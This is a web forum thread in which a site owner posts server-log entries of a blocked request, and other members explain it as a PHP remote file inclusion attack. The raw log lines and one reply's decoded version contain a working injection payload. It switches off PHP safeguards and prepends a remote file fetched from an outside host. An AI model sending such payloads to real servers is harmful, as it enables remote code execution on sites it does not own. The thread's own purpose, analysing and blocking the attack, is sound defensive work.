Welcome to WebmasterWorld Guest from 23.22.46.195

Forum Moderators: Ocean10000 & incrediBILL

GET Request

   
7:38 pm on Nov 16, 2012 (gmt 0)



The php got it 403'd

However, I do not have the savvy to understand this request.

<> SPRINT-WIRELESS

68.240.0.0/13 = 68.240.0.0 - 68.247.255.255

68.240.116.xxx - - [16/Nov/2012:06:14:36 -0800] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+
-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F211.172.112.7%3A8080%2Fecho.txt HTTP/1.1" 403 3251 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

TIA,
Ken

[edited by: incrediBILL at 5:20 am (utc) on Nov 17, 2012]
[edit reason] added line breaks [/edit]

9:22 am on Nov 17, 2012 (gmt 0)

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



This is obviously a hack attempt, trying to inject a script. I wonder if you sent a complaint to SPRINT w/ log snippet whether they'd take any action?
9:40 am on Nov 17, 2012 (gmt 0)

5+ Year Member



It's a variant of the Remote File Inclusion exploit, attempting to pull in a bad file named 'echo.txt' from port 8080 on a server in Seoul, Korea (211.172.112.n:8080).
The Korean organization is 'Iosystem' (211.172.112.0/23), who live at the unfortunately-named 'Sukchon-Dong, Songpa-gu'. Go figure.
10:17 am on Nov 17, 2012 (gmt 0)

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time Top Contributors Of The Month



It's a little more intelligible if you decode:

-dsafe_mode=Off
+-ddisable_functions=NULL
+-dallow_url_fopen=On
+-dallow_url_include=On
+-dauto_prepend_file=http://{filename as identified by iamzippy, above}

I suppose Dong in Korean means something utterly boring like Smith or Street. (I asked g###, but the translator played dumb because it wasn't in Korean script.)

:: off to see if URL is duly mentioned in htaccess ::
12:03 pm on Nov 18, 2012 (gmt 0)



Thanks everyone, I've lurking around for about 3 years now and I have learned a lot from you folks - your expertise has been a great help.

Ken
10:03 pm on Nov 25, 2012 (gmt 0)



Different IP - almost same Request & UA

67.181.147.xxx - - [25/Nov/2012:06:48:27 -0800] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+
-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F50.22.136.150%3A8080%2Fecho.txt HTTP/1.1" 403 3195 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"
 

Featured Threads

My Threads

Hot Threads This Week

Hot Threads This Month